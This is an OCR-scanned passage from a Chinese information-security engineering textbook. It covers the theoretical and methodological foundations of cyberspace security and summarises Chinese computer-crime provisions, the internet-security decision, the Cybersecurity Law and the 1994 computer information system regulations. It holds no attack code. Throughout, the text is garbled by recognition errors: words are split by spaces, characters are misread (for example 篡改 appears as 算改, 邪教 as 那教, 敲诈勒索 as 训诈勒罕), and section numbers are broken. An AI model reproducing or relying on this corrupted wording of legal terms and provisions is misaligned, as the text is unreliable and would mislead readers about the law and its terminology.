制 技术 。 因 此 ， 访 问 控 制 理论 是 网 络 空间 安全 学 科 的 理论 基础 ， 而 且 是 网 络 空间 安全 学 
科 所 特有 的 理论 基础 。 
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(5) 密码 学 理论 是 网 络 空间 安全 学 科 所 特有 的 理论 基础 。 

虽然 前 文 指出 ， 信 息 论 莫 定 了 密码 学 的 基础 。 但 是 ， 密 码 学 在 其 发 展 过 程 中 超越 了 
传统 信息 论 ， 形 成 了 自己 的 一 些 新 理论 。 如 : 单 向 陷 门 函数 理论 、 零 知识 证 明理 论 、 安 
全 多 方 计 算 理论 、 以 及 密码 设计 与 分 析 理 论 。 从 应 用 角度 看 ， 密 码 技术 是 信息 安全 的 一 
种 共性 关键 技术 ， 许 多 信息 安全 领域 都 要 应 用 密码 技术 。 因 此 ， 密 码 学 理论 是 网 络 空间 
安全 学 科 的 理论 基础 ， 而 且 是 网 络 空间 安全 学 科 特 独 有 的 理论 基础 。 

综 上 可 知 ， 数 学 、 信 息 理论 信息论、 系统 论 、 控 制 论 ; 、 计 算 理论 (可 计算 性 理 

、 计 算 复 杂 性 理论 ) 是 网 络 空间 安全 学 科 的 理论 基础 ， 而 博弈 论 、 访 问 控 制 理论 和 密 
四 学 理论 是 网 络 空间 安全 学 科 所 特有 的 理论 伦 基 础 。 


1.1.5 网络 空 间 安 全 学 科 的 方法 论 基础 


-FJL 1637 年 出 版 了 著作 《方法 论 》， 研 究 论述 了 解决 问题 的 方法 ， 对 西方 人 
的 思维 方式 和 科学 研究 方法 产生 了 极 大 的 影响 。 笛 卡尔 在 书 中 把 研究 的 方法 划分 为 4 步 :; 

D 永 不 接受 任何 我 自己 不 清楚 的 真理 。 对 自己 不 清楚 的 东西 ， 不 管 是 什么 权威 的 
结论 ， 都 可 以 怀疑 。 

@ 将 要 研究 的 复杂 问题 ， 尽 量 分 解 为 多 个 比较 简单 的 小 问题 ， 一 个 一 个 地 解决 。 

© 将 这 些小 问题 从 简单 到 复杂 排序 ， 先 从 容易 解决 的 问题 入 手 。 

@ 将 所 有 问题 解决 后 ， 再 综合 起 来 检验 ， 看 是 否 完全 ， 是 否 将 问题 彻底 解决 了 。 

稍 卡 儿 的 方法 论 强调 了 把 复杂 问题 分 解 成 一 些 细小 的 问题 分 别 解决 ， 是 一 种 分 而 治 
之 的 思想 ， 是 一 种 行 之 有 效 的 方法 。 但 是 它 忽视 了 各 个 部 分 的 关联 和 彼此 影响 。 近 代 科 
学 特别 是 系统 论 的 发 展 使 我 们 发 现 ， 许 多 复杂 问题 无 法 分 解 ， 分 解 之 后 的 局 部 并 不 具有 
原来 整体 的 性 质 ， 因 此 必须 用 整体 的 思想 和 方法 来 处 理 ， 由 此 导致 系统 工程 的 出 现 。 于 
是 ， 方 法 论 由 传统 的 方法 论 发 展 到 系统 性 的 方法 论 。 系 统 工程 的 出 现 推动 了 信息 科学 技 
术 的 快速 发 展 。 

网 络 空间 安全 学 科 有 自己 的 方法 论 ， 既 包含 分 而 治之 的 传统 方法 论 ， 又 包含 综合 治 
理 的 系统 工程 方法 论 ， 而 且 将 这 两 者 有 机 地 融合 为 一 体 。 网 络 空间 安全 学 科 的 方法 论 与 
数学 或 计算 机 科学 等 学 科 的 方法 论 既 有 联系 又 有 区 别 。 具体 概括 为 理论 分 析 、 逆 向 分 析 、 
实验 验证 、 技 术 实 现 四 个 核心 内 容 。 这 四 者 既 可 以 独立 运用 ， 也 可 以 相互 结合 ， 指 导 解 
决 网 络 空间 安全 问题 ， 推 动 网 络 空间 安全 学 科 发 展 。 在 运用 网 络 空间 安全 的 方法 论 分 析 
和 解决 网 络 空间 安全 问题 时 ， 特 别 强调 底层 性 和 系统 性 。 即 ， 根 据 网 络 空间 安全 学 科 方 
法 论 的 指导 ， 从 信息 系统 的 软 硬 件 底层 和 系统 角度 来 分 析 信 息 安 全 问题 ， 从 信息 系统 的 
软 硬 件 底层 和 系统 层 综合 采取 措施 来 解决 信息 安全 问题 。 

必须 强调 指出 的 是 ， 逆 向 分 析 是 网 络 空间 安全 学 科 所 特有 的 方法 论 。 这 是 因为 信息 
安全 领域 的 斗争 ， 本 质 上 是 攻防 双方 之 间 的 斗争 ， 因 此 网 络 空间 安全 学 科 的 每 一 分 支 都 
具有 攻 和 防 两 个 方面 。《 孙 子 兵 法 》 告 诉 我 们 ，“ 知 己 知 彼 ， 百 战 不 列 ”。 要 知 彼 ， 就 


第 1 章 信息 安全 基础 


必须 进行 逆向 分 析 。 例 如 ， 密 码 学 由 密码 编码 学 和 密码 分 析 学 组 成 ， 网 络 安全 由 网 络 安 
全 防护 和 网 络 攻 击 组 成 ， 等 等 。 因 此 必须 从 攻 和 防 两 个 方面 进行 研究 。 例 如 ， 在 密码 学 
的 研究 中 ， 既 要 研究 密码 设计 又 要 研究 密码 分 析 。 而 且 在 进行 密码 设计 时 还 要 遵从 公开 
设计 原则 ， 假 设 对 手 知道 密码 算法 、 掌 握 足 够 的 密 文 资源 、 具 有 足够 的 计算 资源 ， 在 这 
样 的 条 件 下 仍 要 确保 密码 是 安全 的 。 同 样 ， 在 网 络 安全 的 研究 中 ， 既 要 研究 网 络 安全 防 
护 又 要 研究 网 络 攻击 。 而 且 在 进行 网 络 安全 防护 设计 时 ， 首 先 要 进行 安全 威胁 分 析 和 风 
险 评估 。 这 些 都 是 逆向 分 析 方法 论 的 具体 应 用 ， 并 且 已 被 实践 证 明 是 正确 的 和 有 效 的 。 
在 设计 和 分 析 信 息 系统 安全 时 ， 既 涉及 到 信息 系统 的 设计 和 分 析 ， 还 涉及 到 系统 的 
组 织 管理 和 法 律 保障 等 诸多 方面 。 除 此 之 外 ， 因 为 人 是 系统 的 管理 者 和 使 用 者 ， 因 此 人 
是 影响 信息 系统 安全 的 重要 因素 。 又 因为 网 络 空间 安全 领域 对 抗 的 本 质 是 人 与 人 之 间 的 
对 抗 ， 而 人 是 最 智能 的 。 不 考虑 人 的 因素 ， 是 不 可 能 有 效 解决 网 络 空间 安全 问题 的 。 
因此 ， 我 们 应 当 ， 以 人 为 核心 ， 运 用 定性 分 析 与 定量 分 析 相 结合 、 注 意 量变 会 引发 
质变 、 综 合 处 理 、 追 求 整 体 效能 ， 解 决 网 络 空间 安全 中 的 理论 、 技 术 和 应 用 问题 。 


12 ”信息 安全 法 律 法 规 


信息 安全 工程 师 应 具备 充分 的 信息 安全 法 律 法 规 意识 ， 掌 握 必 要 的 信息 安全 法 律 法 
规 知识 ， 熟 悉 我 国 已 经 制定 的 信息 安全 方面 的 法 律 、 法 规 和 重要 的 规章 。 


1.2.1 我 国立 法 现状 


我 国 国务 院 于 1994 年 2 月 18 日 颁布 《中 华人 民 共和 国 计 算 机 信息 系统 安全 保护 条 
例 》 这 是 一 个 标志 性 的 、 基 础 性 的 法 规 。 到 目前 为 止 ， 我 国信 息 安 全 的 法 律 体系 可 分 为 
4 个 层面 : 

(1) 一 般 性 法 律 规定 。 如 宪法 、 国 家 安全 法 、 国 家 秘密 法 、 治 安 管理 处 罚 条 例 等 的 
法 律 法 规 并 没有 专门 对 信息 安全 进行 规定 ， 但 是 这 些 法 律 法 规 所 规范 和 约束 的 对 象 包括 
涉及 信息 安全 的 行为 。 

(2) 规范 和 惩罚 信息 网 络 犯罪 的 法 律 。 这 类 法 律 包括 《中 华人 民 共 和 国 刑法 入 《全 
国人 大 常委 会 关于 维护 互联 网 安全 的 决定 》 等 。 

(3) 直接 针对 信息 安全 的 特别 规定 。 这 类 法 律 法 规 主 要 有 《中 华人 民 共 和 国 计 算 机 
信息 系统 安全 保护 条 例 》、《 中 华人 民 共 和 国 计 算 机 信息 网 络 国 际 联网 管理 暂行 规定 》、 
《计算 机 信息 网 络 国际 联网 安全 保护 管理 办 法 》《 中 华人 民 共 和 国电 信条 例 》 等 。 

(4) 具体 规范 信息 安全 技术 、 信 息 安全 管理 等 方面 的 法 律 法 规 。 这 类 法 律 法 规 主要 
有 《商用 密码 管理 条 例 》《 计 算 机 病毒 防治 管理 办 法 》、《 计 算 机 软件 保护 条 例 》《 计 算 
机 信息 系统 国际 联网 保密 管理 规定 》《 中 华人 民 共 和 国电 子 签名 法 》、《 金 融 机 构 计 算 机 
信息 系统 安全 保护 工作 暂行 规定 》 等 。 此 外 还 有 一 些 地 方 性 法 规 和 规章 。 
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党 的 十 八大 以 来 ， 我 国 网 络 空间 法 律 体系 进入 基本 形成 并 飞速 发 展 的 新 阶段 。 伴 随 
着 我 国 互联 网 走向 广泛 应 用 、 深 度 融 合 的 新 阶段 ， 一 方面 全 局 性 、 根 本 性 的 立法 开始 启 
动 ， 国 家 网 信 办 牵头 编制 了 立法 规划 ， 将 《网 络 安全 法 人 《电信 法 人 《电子 商务 法 》 统 
筹 考 虑 并 积极 推进 立法 进程 。 另 一 方面 相关 法 律 、 法 规 、 规 章 和 司法 解释 加 快 出 台 ， 
《刑法 修正 案 ( 九 )》、《 中 华人 民 共 和 国电 信条 例 》《 信 息 网 络 传播 权 保护 条 例 》 等 。 我 国 
虽然 制定 了 许多 有 关 信 息 安全 方面 的 法 律 法 规 ， 但 是 总 体 上 我 国信 息 安 全 立法 还 处 于 起 
步 阶段 ， 具 体 体 现在 以 下 几 个 方面 : 

。 没有 形成 一 个 完整 性 、 实 用 性 、 针 对 性 的 完善 的 法 律 体系 ; 

。 不 具 开 放 性 ; 

。 缺乏 兼容 性 ; 

。 难以 操作 。 
1.2.1.1 计算 机 犯罪 的 刑法 规定 

计算 机 犯罪 是 指 利用 信息 科学 技术 上 且 以 计算 机 为 犯罪 对 象 的 犯罪 行为 。 具 体 可 以 从 
犯罪 工具 角度 、 犯 罪 关系 角度 、 资 产 对 象 角度 、 信 息 对 象 角度 等 方面 定义 。 

首先 是 利用 计算 机 犯罪 , 即将 计算 机 作为 犯罪 工具 ， 以 构成 犯罪 行为 和 结果 的 空间 
为 标准 ， 可 分 为 预备 性 犯罪 和 实行 性 犯罪 。 对 于 前 者 ， 犯 罪 的 后 果 必 须 通 过 现实 空间 而 
不 是 虚拟 空间 实现 。 

从 犯罪 关系 角度 ， 计 算 机 犯罪 是 指 与 计算 机 相关 的 危害 社会 并 应 当 处 以 刑罚 的 
行为 。 

从 资产 对 象 角度 ， 计 算 机 犯罪 是 指 以 计算 机 资产 作为 犯罪 对 象 的 行为 。 例 如 公安 部 
计算 机 管理 监察 司 认 为 计算 机 犯罪 是 :“ 以 计算 机 为 工具 或 以 计算 机 资产 作为 对 象 实施 的 
犯罪 行为 ”。 

从 信息 对 象 角度 ， 计 算 机 犯罪 是 以 计算 机 和 网 络 系统 内 的 信息 作为 对 象 进行 的 犯 
罪 ， 即 计算 机 犯罪 的 本 质 特征 是 信息 犯罪 。 

计算 机 犯罪 与 其 他 类 型 的 犯罪 相 比 ， 具 有 以 下 明显 的 特征 : 首先 是 隐秘 性 强 ， 计 算 
机 或 网 络 系统 被 侵犯 了 而 操作 员 或 者 信息 拥有 者 可 能 毫 不 知情 ; 此 外 侵入 者 通过 计算 机 
操作 ， 很 难 留 下 个 人 信息 。 第 二 是 高 智能 性 ， 计 算 机 和 网 络 犯罪 与 信息 科学 的 先进 科技 
有 密切 的 关系 ， 罪 犯 可 能 掌握 一 些 高 科技 手段 。 第 三 是 破坏 性 强 ， 信 息 犯 罪 中 一 些小 的 
举动 可 能 造成 非常 大 的 破坏 。 第 四 是 无 传统 犯罪 现场 , 计算 机 犯罪 的 现场 应 该 是 从 犯罪 
人 作案 所 使 用 的 计算 机 开始 一 直到 受害 人 的 计算 机 系统 ， 加 上 中 间 途 径 的 所 有 站 点 的 计 
算 机 系统 所 形成 的 一 个 网 络 ， 这 是 一 个 数字 空间 的 犯罪 现场 。 第 五 是 侦查 和 取证 困难 ， 
由 于 计算 机 犯罪 的 高 智能 性 , 据 估计 发 达 国 家 的 计算 机 犯罪 仅 有 5% 一 10% 被 发 现 ， 而 能 
够 破获 的 只 有 1%。 犯 罪人 可 以 重复 登录 、 匿 名 登录 、 隐 藏 卫 地 址 数据 加 密 与 隐藏 等 方 
法 躲避 侦查 ， 同 时 取证 过 程 也 相对 困难 ， 而 且 面 临 转化 过 程 中 的 一 系列 法 律 问题 。 第 六 ， 
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公众 对 计算 机 犯罪 认识 不 如 传统 犯罪 清晰 。 计 算 机 犯罪 往往 没有 鲜血 和 惨状 ， 人 们 习惯 
将 罪犯 描述 为 天 才 ， 将 黑客 描述 为 侠 士 ， 而 受害 对 象 经 常 是 公共 利益 。 第 七 ， 计 算 机 犯 
罪 的 诱惑 性 强 ， 计 算 机 和 网 络 犯 罪 的 技术 性 强 、 富 于 挑战 性 、 犯 罪 后 果 不 直 观 、 侦 察 困 
难 等 特点 对 于 很 多 人 具备 相当 程度 的 诱惑 力 。 第 八 ， 计 算 机 犯罪 经 常 是 跨国 犯罪 ， 由 于 
互联 网 的 特性 ， 计 算 机 犯罪 还 可 能 涉及 到 多 个 国家 ， 而 国际 犯罪 的 司法 管辖 和 协助 本 来 
就 比较 复杂 ， 因 此 计算 机 和 网 络 跨 国 犯罪 层出不穷 。 

中 国 1997 年 刑法 典 在 修改 制订 过 程 中 ， 比 较 充分 地 考虑 到 计算 机 犯罪 的 上 述 特 点 。 

根据 计算 机 犯罪 定义 为 “以 计算 机 资产 (包括 硬件 资产 ， 计 算 机 信息 系统 及 其 服务 ) 
为 犯罪 对 象 的 具有 严重 社会 危害 性 的 行为 ”， 可 将 计算 机 犯罪 分 为 以 下 六 类 ; 

(1) 窃取 和 破坏 计算 机 资产 ; 

(2) 未 经 批准 使 用 计算 机 信息 系统 资源 ; 

(3) 批准 或 超越 权限 接受 计算 机 服务 ; 

(4) 算 改 或 窃取 计算 机 中 保存 的 信息 或 文件 ; 

(5) 计算 机 信息 系统 装 入 欺骗 性 数据 和 记录 ; 

(6) 窃取 或 诈骗 系统 中 的 电子 钱财 。 

根据 侵害 计算 机 信息 结果 发 生 的 过 程 ， 对 计算 机 信息 的 法 律 保护 是 在 禁止 非法 接 
触 、 破 坏 和 滥用 计算 机 信息 这 三 个 环节 的 。 中 国 刑法 在 这 三 个 方面 对 计算 机 犯罪 也 作 了 
具体 的 规定 。 我 国 刑法 关于 计算 机 犯罪 的 规定 主要 体现 在 以 下 三 条 中 : 

第 二 百 八 十 五 条 非法 侵入 计算 机 信息 系统 罪 ) 违 反 国家 规定 ， 侵 入 国家 事务 、 国 
防 建设 、 尖 端 科学 技术 领域 的 计算 机 信息 系统 的 ， 处 三 年 以 下 有 期 徒刑 或 者 拘役 。 

第 二 百 八 十 六 条 破坏 计算 机 信息 系统 罪 ) 违 反 国 家 规定 ， 对 计算 机 信息 系统 功能 
进行 删除 、 修 改 、 增 加 、 干 扰 ， 造 成 计算 机 信息 系统 不 能 正常 运行 ， 后 果 严 重 的 ， 处 五 
年 以 下 有 期 徒刑 或 者 拘役 ;后果 特别 严重 的 ， 处 五 年 以 上 有 期 徒刑 。 违 反 国 家 规定 ， 对 
计算 机 信息 系统 中 存储 、 处 理 或 者 传输 的 数据 和 应 用 程序 进行 删除 、 修 改 、 增 加 的 操作 ， 
后 果 严 重 的 ， 依 照 前 款 的 规定 处 罚 。 故 意 制作 、 传 播 计算 机 病毒 等 破坏 性 程序 ， 影 响 计 
算 机 系统 正常 运行 ， 后 果 严 重 的 ， 依 照 第 一 款 的 规定 处 罚 。 

第 二 百 八 十 七 条 〈 利 用 计算 机 实施 的 各 类 犯罪 ) 利用 计算 机 实施 金融 诈骗 、 盗 窃 、 
贪污 、 挪 用 公款 、 窃 取 国 家 秘密 或 者 其 他 犯罪 的 ， 依 照 本 法 有 关 规 定 定罪 处 罚 。 

在 禁止 非法 接触 计算 机 信息 方面 ， 中 国 刑法 除 在 第 285 条 非法 侵入 计算 机 信息 系统 
罪 中 规定 之 外 ， 第 二 百 八 十 四 条 非法 使 用 窃听 、 窃 照 专用 器 材 罪 之 中 ， 对 这 个 方面 的 行 
为 也 做 了 禁止 性 的 规定 。 

在 禁止 非法 滥用 计算 机 信息 方面 ， 中 国 刑法 对 于 为 了 自己 或 者 他 人 谋取 经 济 利益 或 
者 其 他 利益 而 非法 利用 计算 机 信息 的 行为 ， 采 用 两 种 办 法 进行 规定 。 一 方面 ， 规 定 了 使 


EE 


E: E 


信息 安全 工程 师 教程 


用 现 有 刑法 条 款 打击 计算 机 犯罪 的 方法 〈 如 刑法 第 二 百 八 十 七 条 )， 另 一 方面 ， 明 示 或 者 
默 示 地 在 其 他 法 律 条 文中 规定 了 这 类 计算 机 犯罪 行为 。 

中 国 刑法 对 计算 机 犯罪 作 这 样 的 规定 ， 基 本 上 符合 了 中 国 目 前 打击 计算 机 犯罪 实际 
斗争 的 需要 ， 反 映 了 中 国 对 计算 机 犯罪 进行 严厉 打击 的 立法 态度 ， 保 持 了 与 中 国 目 前 经 
济 技术 的 发 展 阶段 相称 的 刑事 保护 水 平 。 

此 外 ， 在 2005 年 颁布 的 《中 华人 民 共和 国治 安 管理 处 罚 法 》 中 ， 对 未 构成 犯罪 的 
破坏 计算 机 信息 系统 的 行为 也 作 了 处 罚 规定 ， 可 被 处 十 日 以 下 拘留 。 

12.12 ”互联 网 安全 的 刑事 责任 

第 九 届 全 国人 民 代 表 大 会 常务 委员 会 第 十 九 次 会 议 通 过 了 《全 国人 民 代 表 大 会 常务 
员 会 关于 维护 互联 网 安全 的 决定 》。 该 决定 明确 了 以 下 四 类 行为 构成 犯罪 的 , 可 依照 弄 
法 有 关 规 定 追 究 刑 事 责任 》。 

一 是 威胁 互联 网 运行 安全 的 行为 : 

(1) 侵入 国家 事务 、 国 防 建 设 、 尖 端 科 学 技术 领域 的 计算 机 信息 系统 ; 

(2) 故意 制作 、 传 播 计算 机 病毒 等 破坏 性 程序 ， 攻 击 计算 机 系统 及 通信 网 络 ， 致 使 
计算 机 系统 及 通信 网 络 遭 受 损 害 。 

(3) 违反 国家 规定 ， 擅 自 中 断 计 算 机 网 络 或 者 通信 服务 ， 造 成 计算 机 网 络 或 者 通信 
系统 不 能 正常 运行 。 

二 是 威胁 国家 安全 和 社会 稳定 的 行为 : 

a) 利用 互联 网 造谣 、 诽 谤 或 者 发 表 、 传 播 其 他 有 害 信息 ， 煽 动 颠覆 国家 政权 、 推 
翻 社会 主义 制度 ， 或 者 煽动 分 裂 国家 、 破 坏 国 家 统一 ; 

(2) 通过 互联 网 窃取 、 污 露 国家 秘密 、 情 报 或 者 军事 秘密 ; 

(3) 利用 互联 网 煽动 民族 仇恨 、 民 族 歧 视 ， 破 坏 民 族 团结 ; 

(4) 利用 互联 网 组 织 那 教 组 织 、 联 络 那 教 组 织 成 员 ， 破 坏 国 家 法 律 、 行 政法 规 实施 。 

三 是 威胁 社会 主义 市 场 经 济 秩序 和 社会 管理 秩序 的 行为 

CL) 利用 互联 网 销售 伪劣 产品 或 者 对 商品 、 服 务 作 虚假 宣传 ; 

(2) 利用 互联 网 损坏 他 人 商业 信誉 和 商品 声誉 ; 

(3) 利用 互联 网 侵犯 他 人 知识 产权 ; 

(4) 利用 互联 网 编造 并 传播 影响 证 券 、 期 货 交 易 或 者 其 他 扰乱 金融 秩序 的 虚假 信息 ; 

(5) 在 互联 网 上 建立 淫秽 网 站 、 网 页 ， 提供 淫秽 站 点 链接 服务 , 或 者 传播 淫秽 书刊 、 
影片 、 音 像 、 图 片 。 

四 是 威胁 个 人 、 法 人 和 其 他 组 织 的 人 身 、 财 产 等 合法 权利 的 行为 : 

a) 利用 互联 网 侮辱 他 人 或 者 捏造 事实 诽谤 他 人 ; 

(2) 非法 截获 、 算 改 、 删 除 他 人 电子 邮件 或 者 其 他 数据 资料 ， 侵 犯 公民 通信 自由 和 
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通信 秘密 ; 
(3) 利用 互联 网 进行 盗窃 、 诈 骗 、 训 诈 勒 罕 。 


1.2.2 计算 机 和 网 络 安全 的 法 规 规章 


1.2.2.1 中 华人 民 共和 国 网 络 安全 法 

当前 ， 网 络 和 信息 技术 迅猛 发 展 ， 它 已 经 深度 融入 我 国 经 济 社会 的 各 个 方面 ， 极 大 
地 改变 和 影响 着 人 们 的 社会 活动 和 生活 方式 ， 在 促进 技术 创新 、 经 济 发 展 、 文 化 繁荣 、 
社会 进步 的 同时 ， 网 络 安全 问题 也 日 益 凸 显 。 一 是 ， 网 络 入 侵 、 网 络 攻击 等 非法 活动 ， 
严重 威胁 着 重要 领域 的 信息 基础 设施 的 安全 ， 云 计算 、 大 数据 、 物 联网 等 新 技术 、 新 应 
用 面临 着 更 为 复杂 的 网 络 安全 环境 。 二 是 ， 非 法 获取 、 泄 露 甚至 倒卖 公民 个 人 信息 ， 侮 
辱 诽 谤 他 人 、 侵 犯 知识 产权 等 违法 活动 在 网 络 上 时 有 发 生 ， 严 重 损害 公民 、 法 人 和 其 他 
组 织 的 合法 权益 。 三 是 ， 宣 扬 恐 怖 主义 、 极 端 主义 ， 煽 动 颠覆 国家 政权 、 推 翻 社会 主义 
制度 ， 以 及 淫秽 色情 等 违法 信息 ， 借 助 网 络 传播 、 扩 散 ， 严 重 危害 国家 安全 和 社会 公共 
利益 。 网 络 安全 已 成 为 关系 国家 安全 和 发 展 ， 关 系 人 民 和 群众 切身 利益 的 重大 问题 。 

为 适应 目前 形势 ，2015 年 6 月 , 第 十 二 届 全 国人 大 常委 会 第 十 五 次 会 议 初次 审议 了 
《中 华人 民 共 和 国 网 络 安 全 法 (草案 )》。 制定 本 法 是 为 了 保障 网 络 安全 ,维护 网 络 空 间 主 
权 和 国家 安全 、 社 会 公共 利益 ， 保 护 公 民 、 法 人 和 其 他 组 织 的 合法 权益 ， 促 进 经 济 社会 
信息 化 健康 发 展 。 在 中 华人 民 共 和 国境 内 建设 、 运 营 、 维 护 和 使 用 网 络 ， 以 及 网 络 安全 
的 监督 管理 ， 适 用 该 法 。 该 法 主要 对 网 络 安全 战略 、 规 划 与 促进 ， 网 络 运行 安全 ， 网 络 
信息 安全 ， 监 测 预警 与 应 急 处 理 以 及 法 律 责任 方面 进行 了 规定 。 

该 法 提出 国家 坚持 网 络 安全 与 信息 化 发 展 并 重 ， 道 循 积极 利用 、 科 学 发 展 、 依 法 管 
理 、 确 保安 全 的 方针 ， 推 进 网 络 基础 设施 建设 ， 鼓 励 网 络 技术 创新 和 应 用 ， 建 立 健全 网 
络 安全 保障 体系 ， 提 高 网 络 安 全 保护 能 力 ;， 倡导 诚实 守信 、 健 康文 明 的 网 络 行为 ， 采 取 
措施 提高 全 社会 的 网 络 安全 意识 和 水 平 ,形成 全 社会 共同 参与 促进 网 络 安全 的 良好 环境 ; 
积极 开展 网 络 空间 治理 、 网 络 技术 研发 和 标准 制定 、 打 击 网 络 违法 犯罪 等 方面 的 国际 交 
流 与 合作 ， 推 动 构建 和 平 、 安 全 、 开 放 、 合 作 的 网 络 空间 。 该 法 规定 了 国家 网 信 部 门 负 
责 统 筹 协调 网 络 安全 工作 和 相关 监督 管理 工作 。 国 务 院 工 业 和 信息 化 、 公 安 部 门 和 其 他 
有 关 部 门 依照 本 法 和 有 关 法律 、 行 政法 规 的 规定 ， 在 各 自 职 责 范围 内 负责 网 络 安全 保护 
和 监督 管理 工作 。 

同时 ， 任 何 个 人 和 组 织 使 用 网 络 应 当 遵守 宪法 和 法 律 ， 遵 守 公 共 秩 序 ， 尊 重 社会 公 
德 ， 不 得 危害 网 络 安全 ， 不 得 利用 网 络 从 事 危 害 国家 安全 、 宣 扬 恐 怖 主义 和 极端 主义 、 
宣扬 民族 仇恨 和 民族 歧视 、 传 播 淫秽 色情 信息 、 侮 辱 诽谤 他 人 、 扰 乱 社会 秩序 、 损 害 公 
共 利 益 、 侵 害 他 人 知识 产权 和 其 他 合法 权益 等 活动 。 任 何 个 人 和 组 织 都 有 权 对 危害 网 络 
安全 的 行为 向 网 信 、 工 业 和 信息 化 、 公 安 等 部 门 举报 。 收 到 举报 的 部 门 应 当 及 时 依法 作 


a> me 


Son 


信息 安全 工程 师 教程 


出 处 理 ; 不 属于 本 部 门 职责 的 ， 应 当 及 时 移送 有 权 处 理 的 部 门 。 

国家 制定 网 络 安全 战略 ， 明 确保 障 网 络 安全 的 基本 要 求 和 主要 目标 ， 提 出 完善 网 络 
安全 保障 体系 、 提 高 网 络 安全 保护 能 力 、 促 进 网 络 安全 技术 和 产业 发 展 、 推 进 全 社会 共 
同 参与 维护 网 络 安全 的 政策 措施 等 。 

在 网 络 运行 安全 方面 ， 该 法 提出 国家 实行 网 络 安全 等 级 保护 制度 。 网 络 运营 者 应 当 
按照 网 络 安全 等 级 保护 制度 的 要 求 ， 履 行 下 列 安全 保护 义务 ， 保 障 网 络 免 受 干扰 、 破 坏 
或 者 未 经 授权 的 访问 ， 防 止 网 络 数据 泄露 或 者 被 窃取 、 算 改 

(1) 制定 内 部 安全 管理 制度 和 操作 规程 ， 确 定 网 络 安全 负责 人 ， 落 实 网 络 安全 保护 
责任 ; 

(2) 采取 防范 计算 机 病毒 和 网 络 攻 击 、 网 络 入 侵 等 危害 网 络 安全 行为 的 技术 措施 ; 

G) 采取 记录 、 跟 踪 网 络 运行 状态 ， 监 测 、 记 录 网 络 安全 事件 的 技术 措施 ， 并 按照 
规定 留存 网 络 日 志 ; 

(4) 采取 数据 分 类 、 重 要 数据 备份 和 加 密 等 措施 ; 

(5) 法 律 、 行 政法 规 规定 的 其 他 义务 。 

网 络 安全 等 级 保护 的 具体 办 法 由 国务 院 规定 。 

对 于 网 络 运行 安全 中 的 关键 信息 基础 设施 的 运行 安全 方面 ， 国 家 对 提供 公共 通信 、 
广播 电视 传输 等 服务 的 基础 信息 网 络 ， 能 源 、 交 通 、 水 利 、 金 融 等 重要 行业 和 供电 、 供 
水 、 供 气 、 医 疗 卫生 、 社 会 保障 等 公共 服务 领域 的 重要 信息 系统 、 军 事 网 络 、 社 区 的 市 
级 以 上 国家 机 关 等 政务 网 络 ， 用 户 数量 众多 的 网 络 服务 提供 者 所 有 或 者 管理 的 网 络 和 系 
统 〈 以 下 称 关键 信息 基础 设施 )， 实 行 重点 保护 。 关 键 信 息 基础 设施 安全 保护 办 法 由 国务 


院 制定 。 
(1) 该 法 则 规定 网 络 运营 者 应 当 建立 健全 用 户 信息 保护 制度 , 加 强 对 用 户 个 人 信息 、 
隐私 和 商业 秘密 的 保护 。 


(2) 该 法 则 规定 国家 建立 网 络 安全 监测 预警 和 信息 通报 制度 。 国 家 网 信 部 门 应 当 统 
筹 协 调 有 关 部 门 加 强 网 络 安全 信息 收集 、 分 析 和 通报 工作 ， 按 照 规 定 统一 发 布 网 络 安全 
监测 预警 信息 。 
(3) 该 法 则 还 详细 列 出 了 不 履行 本 法 的 行为 应 该 承担 的 相关 法 律 责任 。 
。 这 里 的 网 络 安全 ， 是 指 通过 采取 必要 措施 ， 防 范 对 网 络 的 攻击 、 入 侵 、 干 扰 、 破 
坏 和 非法 使 用 以 及 意外 事故 ， 使 网 络 处 于 稳定 可 靠 运行 的 状态 ， 以 及 保障 网 络 存 
储 、 传 输 、 处 理 信息 的 完整 性 、 保 密 性 、 可 用 性 的 能 
。 这 里 的 网 络 运营 者 ， 是 指 网 络 的 所 有 者 、 管 理 者 以 及 利用 他 人 所 有 或 者 管理 的 网 
络 提供 相关 服务 的 网 络 服务 提供 者 , 包括 基础 电信 运营 者 、 网 络 信息 服务 提供 者 、 
重要 信息 系统 运营 者 等 。 
。 这 里 的 网 络 数据 ， 是 指 通过 网 络 收集 、 存 储 、 传 输 、 处 理 和 产生 的 各 种 电子 数据 。 
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1222 ”中 华人 民 共和 国 计 算 机 信息 系统 安全 保护 条 例 

1994 年 2 H 18 日 中 华人 民 共 和 国 国务 院 令 147 号 发 布 了 《中 华人 民 共 和 国 计 算 机 
信息 系统 安全 保护 条 例 》。 该 条 例 是 我 国 在 信息 系统 安全 保护 方面 最 早 制定 的 一 部 法 规 ， 
也 是 我 国信 息 系统 安全 保护 最 基本 的 一 部 法 规 ， 它 确立 了 我 国信 息 系统 安全 保护 的 基本 
原则 ， 为 以 后 相关 法 规 的 制定 葛 定 了 基础 。 条 例 的 宗旨 是 保护 计算 机 信息 系统 的 安全 ， 
促进 计算 机 的 应 用 和 发 展 ， 保 障 社会 主义 现代 化 建设 的 顺利 进行 。 该 条 例 中 计算 机 信息 
系统 的 概念 ， 是 指 由 计算 机 及 其 相关 的 和 配套 的 设备 、 设 施 和 网 络 构成 的 ， 按 照 一 定 的 
应 用 目标 和 规则 对 信息 进行 采集 、 加 工 、 存 储 、 传 输 、 检 索 等 处 理 的 人 机 系统 。 

该 条 例 有 如 下 适用 范围 : 

(1) 条 例 适用 于 组 织 和 个 人 

(2) 中 华人 民 共 和 国境 内 的 计算 机 信息 系统 的 安全 保护 适用 本 条 例 ; 

G) 未 联网 的 微型 计算 机 的 安全 保护 不 适用 本 条 例 ; 

(4) 军队 的 计算 机 信息 系统 安全 保护 工作 ， 按 照 军 队 的 有 关 法 规 执 行 。 

计算 机 信息 系统 安全 保护 的 内 容 是 : 保障 计算 机 及 其 相关 的 和 配套 的 设备 、 设 施 和 
网 络 的 安全 ， 运 行 环境 的 安全 ， 保 障 信息 的 安全 ， 保 障 计 算 机 功能 的 正常 发 挥 ， 维 护 计 
算 机 信息 系统 的 安全 运行 。 其 中 重点 维护 国家 事务 、 经 济 建设 、 国 防 建设 、 尖 锐 科学 技 
术 等 重要 领域 的 计算 机 信息 系统 的 安全 。 

该 条 例 明确 确 定 了 安全 监督 的 职权 和 义务 。 公 安 机 关 对 计算 机 信息 系统 保护 工作 行 
使 下 列 监督 职权 : 

(1) 监督 、 检 查 、 指 导 计 算 机 信息 系统 安全 保护 工作 ; 

(2) 查处 危害 计算 机 信息 系统 安全 的 违法 犯罪 案件 ; 

(3) 履行 计算 机 信息 系统 安全 保护 工作 的 其 他 监督 职责 。 

